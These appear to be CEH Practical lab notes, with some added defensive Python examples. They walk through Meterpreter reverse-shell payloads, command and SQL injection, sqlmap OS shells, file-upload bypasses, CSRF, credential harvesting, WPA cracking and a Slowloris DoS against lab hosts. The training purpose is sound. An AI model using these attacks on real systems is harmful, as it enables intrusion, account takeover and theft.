      Add "output alert_fast: alerts.ids" at line #533 so that Snort dumps all logs to alerts.ids
    In snort.conf, find and replace the 'ipvar' string with 'var'
  Open C:\Snort\rules\icmp-info.rules with Notepad++ and type the following at line 21:
    alert icmp $EXTERNAL_NET any -> $HOME_NET 10.10.10.12 (msg:"ICMP-INFO PING"; icode:0; itype:8; reference:arachnids,135; reference:cve,1999-0265; classtype:bad-unknown; sid:472; rev:7;)
  cmd: snort -i<index number> -A console -c C:\Snort\etc\snort.conf -l C:\Snort\log -K ascii
  On the error "Could not create the registry key", run cmd as an Administrator.
  Windows 10: ping 10.10.10.12 -t
  Observe that Snort triggers an alarm. Ctrl+C to stop Snort.
  Check C:\Snort\log\10.10.10.10\ICMP_ECHO.ids with Notepad++

Detecting Malicious Network Traffic Using HoneyBOT
  HoneyBOT is a medium-interaction honeypot for Windows. A honeypot creates a safe environment to capture and interact with unsolicited traffic on a network. HoneyBOT is an easy-to-use solution that is ideal for network security research or as part of an early-warning IDS.
  In Windows 2016, IIS Manager > Connections > Server node > expand Sites > right-click FTP > Manage FTP Site > Stop
  Install and run HoneyBOT.
  In Kali Linux, ftp 10.10.10.16
  Observe the traffic reported in HoneyBOT ports and remotes.
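To make concrete what the ICMP rule entered in icmp-info.rules above actually matches, here is an added example (not Snort's code and not from the lab notes): a small evaluator for the subset of the rule language that rule uses. It parses the header and options, resolves $HOME_NET and $EXTERNAL_NET from the snort.conf values set above (EXTERNAL_NET as the negation of HOME_NET, as in a stock snort.conf), ignores the port fields for ICMP, and runs constructed packets through the rule, printing alert_fast-style lines.

```python
import ipaddress
import re

# The rule typed into icmp-info.rules above, verbatim.
RULE = ('alert icmp $EXTERNAL_NET any -> $HOME_NET 10.10.10.12 (msg:"ICMP-INFO PING"; '
        'icode:0; itype:8; reference:arachnids,135; reference:cve,1999-0265; '
        'classtype:bad-unknown; sid:472; rev:7;)')

# Variables as set in snort.conf above.
VARIABLES = {"HOME_NET": "10.10.10.12", "EXTERNAL_NET": "!$HOME_NET"}

# Constructed packets (no real capture): only the fields this evaluator reads.
SAMPLE_PACKETS = [
    {"proto": "icmp", "src": "10.10.10.10", "dst": "10.10.10.12", "itype": 8, "icode": 0},  # echo request in
    {"proto": "icmp", "src": "10.10.10.12", "dst": "10.10.10.10", "itype": 0, "icode": 0},  # echo reply out
    {"proto": "icmp", "src": "10.10.10.12", "dst": "10.10.10.10", "itype": 8, "icode": 0},  # request from HOME_NET
    {"proto": "tcp", "src": "10.10.10.10", "dst": "10.10.10.12", "sport": 40000, "dport": 80},
]

HEADER_RE = re.compile(
    r"^(\w+)\s+(\w+)\s+(\S+)\s+(\S+)\s+(->|<>)\s+(\S+)\s+(\S+)\s*\((.*)\)\s*$", re.S)


def parse_rule(text: str) -> dict:
    """Split a Snort text rule into its header fields and an options dict."""
    m = HEADER_RE.match(text.strip())
    if not m:
        raise ValueError("unsupported rule syntax")
    action, proto, src, sport, direction, dst, dport, body = m.groups()
    options = {"reference": []}   # reference may repeat; other keys are single-valued
    for item in body.split(";"):
        item = item.strip()
        if not item:
            continue
        key, _, value = item.partition(":")
        key, value = key.strip(), value.strip().strip('"')
        if key == "reference":
            options["reference"].append(value)
        else:
            options[key] = value
    return {"action": action, "proto": proto.lower(), "src": src, "sport": sport,
            "direction": direction, "dst": dst, "dport": dport, "options": options}


def addr_matches(spec: str, ip: str, variables: dict) -> bool:
    """Evaluate an address field: any, !negation, $VARIABLE, or an IP/CIDR."""
    if spec == "any":
        return True
    if spec.startswith("!"):
        return not addr_matches(spec[1:], ip, variables)
    if spec.startswith("$"):
        return addr_matches(variables[spec[1:]], ip, variables)
    return ipaddress.ip_address(ip) in ipaddress.ip_network(spec, strict=False)


def port_matches(spec: str, port: int) -> bool:
    """Evaluate a port field: any, one port, or a low:high range."""
    if spec == "any":
        return True
    if ":" in spec:
        low, _, high = spec.partition(":")
        return int(low or 0) <= port <= int(high or 65535)
    return int(spec) == port


def rule_matches(rule: dict, pkt: dict, variables: dict) -> bool:
    if pkt["proto"] != rule["proto"]:
        return False
    fwd = (addr_matches(rule["src"], pkt["src"], variables)
           and addr_matches(rule["dst"], pkt["dst"], variables))
    rev = (rule["direction"] == "<>" and addr_matches(rule["src"], pkt["dst"], variables)
           and addr_matches(rule["dst"], pkt["src"], variables))
    if not (fwd or rev):
        return False
    # Port fields only apply to TCP/UDP; ICMP has no ports, so they are skipped.
    if rule["proto"] in ("tcp", "udp") and not (
            port_matches(rule["sport"], pkt["sport"]) and port_matches(rule["dport"], pkt["dport"])):
        return False
    opts = rule["options"]
    return all(key not in opts or int(opts[key]) == pkt.get(key) for key in ("itype", "icode"))


def run_rules(rules, packets, variables) -> list:
    """Return an alert_fast-style line for every packet each rule matches."""
    alerts = []
    for pkt in packets:
        for rule in rules:
            if rule_matches(rule, pkt, variables):
                o = rule["options"]
                alerts.append(f"[**] [1:{o['sid']}:{o['rev']}] {o['msg']} [**] "
                              f"{{{rule['proto'].upper()}}} {pkt['src']} -> {pkt['dst']}")
    return alerts


if __name__ == "__main__":
    for line in run_rules([parse_rule(RULE)], SAMPLE_PACKETS, VARIABLES):
        print(line)
```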
Bypassing Windows Firewall Using Nmap Evasion Techniques
  In Windows 10, turn on Windows Defender Firewall.
  Advanced settings > Inbound Rules > New Rule > Custom; Scope - add Kali Linux (10.10.10.11); Action - Block the connection
  In Kali Linux:
  nmap 10.10.10.10 (1000 filtered ports)
  nmap -sS 10.10.10.10 (1000 filtered ports)
  nmap -T4 -A 10.10.10.10 - intense scan (1000 filtered ports)
  nmap -sP 10.10.10.0/24 - ping sweep
  nmap -sI 10.10.10.12 10.10.10.10 - zombie scan (lists open ports)

Bypassing Firewall Rules Using HTTP/FTP Tunneling
  In Windows 2012, disable the IIS Admin Service and the World Wide Web Publishing service.
  Run htthost.exe, set a password + Revalidate DNS names and Log Connections.
  Application log > check "Listener: listening at 0.0.0.0:80"
  In Windows 2016, Run > inetmgr
  Server node --> expand Sites node --> right-click FTP --> select Manage FTP Site --> click Stop
  Windows Firewall > Advanced settings > Outbound Rules > New Rule
  Rule Type: Port > Protocol and Ports: TCP + All remote ports > Action: Block the connection > Profile: Domain, Private and Public > Name: Port 21 Blocked
  Port 21 Blocked > Properties > Protocols and Ports > Remote Port: Specific Ports - 21
  Port 21 Blocked > Disable Rule: ftp 10.10.10.10 connects. Enable the rule: ftp doesn't connect.
  Run httport3snfm.exe > Proxy tab > 10.10.10.12:80 > Misc. options, Bypass mode, select Remote host
  Use personal remote host at (blank = use public) > re-enter the proxy details. Enter the password set in the proxy.
  Port mapping tab > Add > Local port: 21 / Remote host: 10.10.10.10 / Remote port: 21
  HTTPort Proxy tab > Start
  ftp 10.10.10.10 doesn't work, but ftp 127.0.0.1 does.

Bypassing Windows Firewall using Metasploit
  In Windows 2012, turn on Windows Defender Firewall.
  In Kali Linux:
  msfvenom -p windows/meterpreter/reverse_tcp --platform windows -a x86 -e x86/shikata_ga_nai -b "\x00" LHOST=10.10.10.11 -f exe > Desktop/Backdoor.exe
  Share Backdoor.exe using the web server.
  msfconsole
  use exploit/multi/handler
  show options
  set payload windows/meterpreter/reverse_tcp
  set LHOST 10.10.10.11
  show options
  exploit -j -z
  In Windows 2012, download Backdoor.exe and run it.
  In Kali Linux, a Meterpreter session is created.
  sessions -i
  sessions -i 1
  execute -f cmd.exe -c -H
  shell
  netsh firewall show opmode
  netsh advfirewall set allprofiles state off (in Windows 2012, verify that the firewall is off for all profiles)
  exit (back to the Meterpreter session)
  getsystem
  ps
Module 13: Hacking Web Servers

Performing Web Server Reconnaissance using Skipfish
  skipfish -o /root/test -S /usr/share/skipfish/dictionaries/complete.wl http://[IP Address of Windows Server 2012]:8080

Footprinting a Web Server Using the httprecon Tool
  Windows tool

Footprinting a Web Server Using ID Serve

Cracking FTP Credentials Using Dictionary Attack
  nmap -p 21 10.10.10.10
  hydra -L /root/Desktop/Wordlists/Usernames.txt -P /root/Desktop/Wordlists/Passwords.txt ftp://[IP Address of Windows 10]

Uniscan Web Server Fingerprinting in Kali Linux
  uniscan -h
  uniscan -u http://10.10.10.12:8080/CEH -q
  uniscan -u http://10.10.10.12:8080/CEH -we
  uniscan -u http://10.10.10.12:8080/CEH -d
  Reports: /usr/share/uniscan/report
Module 14: Hacking Web Applications

Exploiting Parameter Tampering and XSS Vulnerabilities in Web Applications
  Parameter tampering
  Cross-site scripting (XSS or CSS) - injecting client-side scripts

Enumerating and Hacking a Web Application Using WPScan and Metasploit
  In Kali Linux: wpscan --url http://[IP Address of Windows Server 2012]:8080/CEH --enumerate u
  msfconsole
  use auxiliary/scanner/http/wordpress_login_enum
  show options
  set PASS_FILE /root/Desktop/Wordlists/Passwords.txt
  set RHOSTS [IP Address of Windows Server 2012]
  set RPORT 8080
  set TARGETURI http://[IP Address of Windows Server 2012]:8080/CEH/
  set USERNAME admin (or any user obtained with WPScan)
  run

Exploiting Remote Command Execution Vulnerability to Compromise a Target Web Server
  In Windows 10, open http://10.10.10.12:8080/dvwa
  Command Injection > ping. It blocks other commands ( | hostname ).
  DVWA Security: Impossible > Low
  Command Injection > ping. It now executes other commands ( | hostname ):
    | whoami
    | tasklist
    | dir C:\
    | net user
    | net user Test /Add
    | net user
    | net user Test
    | net localgroup Administrators Test /Add
    | net user Test
  Start --> Windows Accessories --> Remote Desktop Connection.
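The difference between the Low and Impossible levels of the DVWA ping form above, as an added example (not DVWA's own PHP code): vulnerable_command() builds the command string the way the Low level does, command_count() shows how many commands a shell would actually run for it, and safe_ping_argv() is the hardened equivalent that accepts only a single IP address and passes it to subprocess as an argv list with no shell. The "ping " prefix and the -c/-n count flag are this example's assumptions.

```python
import ipaddress
import shlex
import subprocess
import sys

# Shell tokens that start a second command; the lab uses "|" throughout.
SEPARATORS = {"|", "||", "&", "&&", ";"}


def vulnerable_command(target: str) -> str:
    """The Low-level pattern: the form field is glued into a shell command string."""
    return "ping " + target


def command_count(shell_string: str) -> int:
    """How many separate commands a shell would run for this string."""
    tokens = list(shlex.shlex(shell_string, posix=True, punctuation_chars=True))
    return 1 + sum(1 for t in tokens if t in SEPARATORS)


def safe_ping_argv(target: str) -> list:
    """Validate the field as exactly one IP address and build argv for a
    shell-free exec. Anything else ("10.10.10.12 | hostname", a hostname,
    an empty string) is rejected before any process is started."""
    try:
        ip = ipaddress.ip_address(target.strip())
    except ValueError as exc:
        raise ValueError(f"rejected: not an IP address: {target!r}") from exc
    count_flag = "-n" if sys.platform.startswith("win") else "-c"
    return ["ping", count_flag, "4", str(ip)]


def run_safe_ping(target: str, timeout: float = 15.0) -> str:
    """Run ping without a shell: argv elements are passed to the program as-is,
    so metacharacters in `target` are never interpreted. Not called by the test."""
    argv = safe_ping_argv(target)
    done = subprocess.run(argv, capture_output=True, text=True, timeout=timeout, check=False)
    return done.stdout


if __name__ == "__main__":
    for field in ("10.10.10.12", "10.10.10.12 | hostname"):
        print(f"{field!r}: Low runs {command_count(vulnerable_command(field))} command(s)")
        try:
            print("  hardened argv:", safe_ping_argv(field))
        except ValueError as err:
            print("  hardened:", err)
```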
Auditing Web Application Framework Using Vega
  In Kali Linux, Applications --> 03 - Web Application Analysis --> Vega
  Injection Modules + Response Processing Modules

Website Vulnerability Scanning Using Acunetix WVS
  Business Criticality - High
  Full Scan / OWASP Top 10 / Instant

Exploiting File Upload Vulnerability at Different Security Levels
  In Kali Linux: msfvenom -p php/meterpreter/reverse_tcp lhost=10.10.10.11 lport=4444 -f raw
  Use Leafpad to save the payload into upload.php
  http://10.10.10.12:8080/dvwa/login.php
  DVWA Security > Low
  File Upload > upload.php
  msfconsole
  use multi/handler
  show options
  set payload php/meterpreter/reverse_tcp
  set lhost 10.10.10.11
  set lport 4444
  run
  Open http://10.10.10.12:8080/dvwa/hackable/uploads/upload.php; a session is created automatically (if not: sessions -i 1)
  sysinfo
  Close all.
  DVWA Security > Medium
  File Upload > upload.php returns an error.
  Rename the payload to upload.php.jpg
  Set up Burp Suite as an intercepting proxy and upload the file upload.php.jpg
  In Burp Suite, rename the filename to upload.php. The upload succeeds. Remove the proxy from the browser.
  msfconsole
  use multi/handler
  set payload php/meterpreter/reverse_tcp
  set lhost 10.10.10.11
  set lport 4444
  run
  Open http://10.10.10.12:8080/dvwa/hackable/uploads/upload.php; a session is created automatically (if not: sessions -i 1)
  sysinfo
  Close all.
  DVWA Security > High
  File Upload > upload.php returns an error.
  Rename the payload back to upload.php. With a text editor, put GIF98 as the first line.
  Rename the payload to upload.jpg
  Upload succeeds
  DVWA > Command Injection
  |copy C:\wamp64\www\DVWA\hackable\uploads\upload.jpg C:\wamp64\www\DVWA\hackable\uploads\shell.php
  msfconsole
  use multi/handler
  set payload php/meterpreter/reverse_tcp
  set lhost 10.10.10.11
  set lport 4444
  run
  http://10.10.10.12:8080/dvwa/hackable/uploads/shell.php
  A session is created automatically; if not: sessions -i 1
  sysinfo
  close all

Performing Cross-Site Request Forgery (CSRF) Attack (one-click attack or session riding)
In Windows 2012, http://10.10.10.12:8080/CEH/wp-login.php, log in as admin
  Plugins > WordPress Firewall 2 > Whitelist 10.10.10.12
In Kali Linux:
  wpscan -u http://10.10.10.12:8080/CEH --enumerate vp
  Save this script as Security_Script.html:
  <form method="POST" action="http://10.10.10.12:8080/CEH/wp-admin/options-general.php?page=wordpress-firewall-2%2Fwordpress-firewall-2.php">
  <script>alert("As an Admin, To enable additional security to your Website. Click Submit")</script>
  <input type="hidden" name="whitelisted_ip[]" value="10.10.10.11" >
  <input type="hidden" name="set_whitelist_ip" value="Set Whitelisted IPs" class="button-secondary">
  <input type="submit">
  </form>
  Share Security_Script.html with Windows 2012 (over an smb:// share), open it in the browser that is logged in to WordPress and click Submit.
  Observe in WordPress Firewall 2 that the whitelisted IP changed to 10.10.10.11.
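The server-side checks that would have stopped each of the three upload bypasses above (the Burp rename, the double extension, and the image header in front of PHP), as an added example that is not part of the original notes or of DVWA. The upload directory, the allowlist and the sample blobs are assumptions constructed for the example.

```python
# Added example (not from the original notes): server-side checks that close the
# three upload bypasses walked through above (client-chosen name, double
# extension, image header on a script). Paths and names are assumed.
import hashlib
import pathlib

UPLOAD_DIR = pathlib.Path("/srv/uploads")  # assumed: outside the web root, no execute
ALLOWED = {                                # extension -> accepted leading bytes
    ".jpg": (b"\xff\xd8\xff",),
    ".jpeg": (b"\xff\xd8\xff",),
    ".png": (b"\x89PNG\r\n\x1a\n",),
    ".gif": (b"GIF87a", b"GIF89a"),
}
MAX_BYTES = 2 * 1024 * 1024
SCRIPT_MARKERS = (b"<?php", b"<?=", b"<script")

def validate_upload(client_filename: str, data: bytes) -> pathlib.Path:
    """Validate an uploaded image and return the server-chosen path to store it at.
    Raises ValueError with the reason when the file must be rejected."""
    if len(data) > MAX_BYTES:
        raise ValueError("file too large")
    suffixes = pathlib.PurePosixPath(client_filename).suffixes
    # 'upload.php.jpg' has two suffixes; accept exactly one, from the allowlist.
    if len(suffixes) != 1 or suffixes[0].lower() not in ALLOWED:
        raise ValueError("extension not allowed")
    ext = suffixes[0].lower()
    # Medium-level bypass: the name says image, the bytes say PHP.
    if not data.startswith(ALLOWED[ext]):
        raise ValueError("content does not match extension")
    # High-level bypass: a valid header does not make the body an image.
    if any(marker in data for marker in SCRIPT_MARKERS):
        raise ValueError("script content inside image")
    # Burp rename has no effect: the stored name comes from the content, never the client.
    return UPLOAD_DIR / f"{hashlib.sha256(data).hexdigest()}{ext}"

def rejection_reason(client_filename: str, data: bytes):
    """Return why a file would be rejected, or None when it passes."""
    try:
        validate_upload(client_filename, data)
    except ValueError as err:
        return str(err)
    return None

# Constructed samples (not real lab files): a minimal GIF-like blob, and a GIF
# header followed by a harmless PHP open tag, mimicking the lab's header trick.
FAKE_GIF = b"GIF89a" + b"\x01\x00\x01\x00" + b"\x00" * 32
POLYGLOT = b"GIF89a\n<?php /* constructed marker only */ ?>"
```

Storing uploads outside the web root under a server-generated name also removes the second half of the high-level chain above: even a file that passes every check cannot be copied to shell.php and executed by the web server.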
Module 15: SQL Injection

SQL Injection Attacks on an MS SQL Database
In Windows 2012, http://www.goodshopping.com
  Login u: blah' or 1=1 --
In Windows Server 2016, Microsoft SQL Server Management Studio (Windows Authentication)
  Databases --> GoodShopping --> Tables
  Right-click dbo.Login and click Select Top 1000 Rows
In Windows 2012, http://www.goodshopping.com
  Login u: blah';insert into login values ('john','apple123'); --
  Verify the login. Check the dbo.Login table as well.
In Windows 2012, http://www.goodshopping.com
  Login u: blah';create database mydatabase; --
In Windows Server 2016, check Microsoft SQL Server Management Studio for the new database.
In Windows 2012, http://www.goodshopping.com
  Login u: blah';exec master..xp_cmdshell 'ping www.xyz.com -l 65000 -t'; --
In Windows Server 2016, Task Manager, check that ping.exe is running.

Scanning Web Applications Using N-Stalker Tool
In Windows Server 2016, N-Stalker Free X
  http://www.goodshopping.com, OWASP Policy

Performing SQL Injection Attack Against MSSQL to Extract Databases and WebShell Using SQLMAP
In Kali Linux, log in to http://www.xyz.com with an available user login. View Profile.
  Inspect Element > Console tab > type document.cookie > copy the cookie value
  sqlmap -u "http://www.xyz.com/viewprofile.aspx?id=1" --cookie="<cookie value which you have copied>" --dbs
  To get the tables of db xyz:
  sqlmap -u "http://www.xyz.com/viewprofile.aspx?id=1" --cookie="<cookie value>" -D xyz --tables
  To get the columns of table User_Login:
  sqlmap -u "http://www.xyz.com/viewprofile.aspx?id=1" --cookie="<cookie value>" -D xyz -T User_Login --columns
  To dump table User_Login:
  sqlmap -u "http://www.xyz.com/viewprofile.aspx?id=1" --cookie="<cookie value>" -D xyz -T User_Login --dump
  To gain an OS shell:
  sqlmap -u "http://www.xyz.com/viewprofile.aspx?id=1" --cookie="<cookie value>" --os-shell
  optimize value(s) for DBMS delay responses - Y
  hostname
  ipconfig
Module 16: Hacking Wireless Networks

WiFi Packet Analysis Using Wireshark
  The 802.11 protocol indicates wireless packets

Cracking WEP with Aircrack-ng
  aircrack-ng WEPcrack01.cap

Cracking WPA (Wi-Fi Protected Access) with Aircrack-ng
  aircrack-ng -a2 -b 20:E5:2A:E4:38:00 -w /root/Desktop/Wordlists/Passwords.txt '/root/Desktop/Sample Captures/WPA2crack-01.cap'
  -a is the technique used to crack the handshake; 2 = WPA technique.
  -b refers to the BSSID; replace it with the BSSID of the target router.
  -w stands for wordlist; provide the path to a wordlist.
Module 17: Hacking Mobile Platforms

Creating Binary Payloads Using Kali Linux to Hack Android
In Android, root terminal:
  ip addr add 10.10.10.69/24 dev eth0
In Kali Linux:
  service postgresql start
  msfvenom -l
  msfvenom -p android/meterpreter/reverse_tcp --platform android -a dalvik LHOST=10.10.10.11 R > Desktop/Backdoor.apk
  Share Backdoor.apk using a web server.
  msfconsole
  use exploit/multi/handler
  show options
  set payload android/meterpreter/reverse_tcp
  set LHOST 10.10.10.11
  show options (check the listening port)
  exploit -j -z
In Android, download Backdoor.apk and install it.
In Kali Linux, a session is created automatically; if not: sessions -i 1
  sysinfo
  ipconfig
  pwd; cd /sdcard; pwd; ls
  ps

Harvesting Users' Credentials Using the Social Engineering Toolkit
In Android, root terminal:
  ip addr add 10.10.10.69/24 dev eth0
In Kali Linux, Applications --> 08 - Exploitation Tools --> social engineering toolkit
  bleeding-edge repos - No
  1 - Social-Engineering Attacks
  2 - Website Attack Vectors
  3 - Credential Harvester Attack Method
  2 - Site Cloner
  POST back in Harvester/Tabnabbing - IP of Kali Linux (10.10.10.11)
  Enter the url to clone - http://www.goodshopping.com
  Do you want to attempt to stop apache server? (Y/N) - Y
In Android, access the cloned website and try logging in. You will be redirected to a "Webpage not available" page.
In Kali Linux, setoolkit captures the login credentials. Check /usr/share/set/src/logs/harvester.log
Module 19: Cloud Computing

Creating User Accounts and Assigning User Rights in ownCloud

Securing ownCloud from Malicious File Uploads Using ClamAV
In Kali Linux:
  msfvenom -p windows/meterpreter/reverse_tcp -f exe > /root/Desktop/trojan.exe
  ownCloud blocks this at upload.

Bypassing ownCloud Antivirus and Hacking the Host Using Kali Linux
In Kali Linux:
  msfvenom -p linux/x86/shell/reverse_tcp LHOST=10.10.10.11 LPORT=4444 --platform linux -f elf > /root/Desktop/exploit.elf
  The ownCloud upload goes through.
  msfconsole
  use multi/handler
  show options
  set payload linux/x86/shell/reverse_tcp
  set LHOST 10.10.10.11
  set LPORT 4444
  run
In Ubuntu, download exploit.elf
  chmod -R 755 exploit.elf
  ./exploit.elf
In Kali Linux, a session is created automatically; if not: sessions -i 1
  ifconfig, pwd, whoami

Implementing DoS Attack on Linux Cloud Server Using Slowloris Script
In Kali Linux, run Wireshark and monitor.
  chmod 777 Slowloris.pl
  ./Slowloris.pl -dns 10.10.10.9
  Check Wireshark. Ctrl+C stops the attack.
Module 20: Cryptography

Calculating One-Way Hashes Using HashCalc

Calculating MD5 Hashes Using MD5 Calculator
  MD5 is not collision resistant; therefore, it is better to use the latest algorithms, such as SHA-2 and SHA-3.

Understanding File and Text Encryption Using CryptoForge

Encrypting and Decrypting the Data Using BCTextEncoder

Creating and Using Self-Signed Certificate Using IIS Manager

Basic Disk Encryption Using VeraCrypt
  Create Volume
  Create an encrypted file container
  Standard VeraCrypt volume
  AES/SHA-512

Basic Data Encryption Using CrypTool
All credit goes to: https://github.com/nirangadh/ceh-practical